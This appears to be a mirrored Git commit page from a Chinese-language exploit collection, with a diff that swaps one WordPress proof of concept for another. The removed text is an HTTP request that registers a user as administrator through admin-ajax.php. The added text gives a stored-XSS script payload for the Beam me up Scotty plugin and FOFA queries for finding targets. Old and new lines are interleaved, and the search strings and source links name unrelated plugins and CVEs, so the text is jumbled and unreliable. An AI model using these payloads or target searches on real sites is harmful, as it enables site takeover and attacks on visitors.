admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md

Browse Source
This commit is contained in:
Rainyseason 2025-04-07 14:11:01 +08:00 committed by GitHub
parent 67466e18fa
commit f32dace32e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
wpoc/WordPress/WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864).md
View File

@ -1,45 +1,31 @@
## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864) ## WordPress Beam me up Scotty Plugin存在xss漏洞(CVE-2025-31864)
Beam me up Scotty 插件 1.0.23 及以下版本中,由于“返回顶部按钮”自定义设置的数据类型验证和转义处理不足,存在存储型跨站点脚本漏洞。
这些自定义设置只有具有管理员权限的用户才能访问,如果具有管理员权限的攻击者利用此漏洞,则所有显示“返回顶部按钮”的页面的访问者都将面临跨站点脚本攻击。
## fofa ## fofa
``` ```
"/wp-content/plugins/wp-automatic" body="/wp-content/plugins/web-directory-free"
``` ```
## 第一步 ## 第一步
通过 /registration 或 /membership-registration 前端页面注册 导航到自定义“返回顶部按钮”的菜单(/wp-admin/themes.php?page=beam-me-up-scotty_settings
## 第二步,注册后,使用该请求数据 ![image](https://github.com/user-attachments/assets/14e3a132-b211-484d-8bf7-1c3c7f26904d)
```
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335 ## 第二步
Content-Disposition: form-data; name="action" 在启用了代理工具例如BurpSuite拦截的情况下点击返回顶部按钮设置菜单底部的保存按钮即可拦截保存返回顶部按钮自定义设置的请求包。
![image](https://github.com/user-attachments/assets/076678dc-90cd-4847-a337-eff3875f0a65)
user_registration_membership_register_member 将请求payload中payload的值改为beam_me_up_scotty_bottom_indentation如下然后执行Forward
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
``` ```
## 第三步,返回相应包如下 20px;}</style><script>alert("XSS")</script><style>foo{bottom:0
``` ```
{ ![image](https://github.com/user-attachments/assets/f2f67dc8-ff2b-4094-b547-31f53cc94527)
"success": true,
"data": { ## 第三步
"member_id": 24, 访问WordPress网站后即可确认存在XSS漏洞。
"transaction_id": "", ![image](https://github.com/user-attachments/assets/cf800af5-0d55-46b1-a825-297494d5b18b)
"message": "New member has been successfully created."
}
} ## 漏洞来源
``` - https://github.com/4m3rr0r/CVE-2025-30208-PoC
## github地址
https://github.com/ubaydev/CVE-2025-2563